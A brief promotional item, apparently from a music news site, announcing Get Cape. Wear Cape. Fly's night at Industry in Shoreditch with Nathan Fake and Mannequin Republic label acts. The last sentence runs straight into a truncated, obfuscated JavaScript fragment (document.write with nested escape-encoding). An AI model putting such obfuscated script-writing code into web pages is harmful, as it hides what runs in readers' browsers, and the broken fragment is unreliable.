Following the huge success of San Miguel Hidden Depths' DJ Yoda and Warp Films-curated events (with Arctic Monkeys, Richard Hawley, Jarvis Cocker and the Mighty Boosh cast amongst the attendees), next Wednesday will see Get Cape. Wear Cape. Fly taking the helm.
Get Cape. Wear Cape. Fly is the musical moniker of 21-year-old musician, producer and songwriter Sam Duckworth, whose unique approach to music splices classic activist folk-rock with modern technology to create an irrepressible body of work.
Get Cape's event will take place at Industry in Shoreditch, and will see Duckworth demonstrating the talents that have lead to him achieving sell out shows up and down the country. This night will see him taking a break from recording sessions for his Nitin Sawhney-produced new album (the follow-up to his critically acclaimed debut, 'The Chronicles Of A Bohemian Teenager') to preview exclusive new tracks.
He will be joined for a special live performance by one of the UK's most exciting and forward thinking young electronic musicians, Nathan Fake, as well as friends from his newly launched Mannequin Republic record label, including the Huw Stephens-approved Boom in the Diamond Industry.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
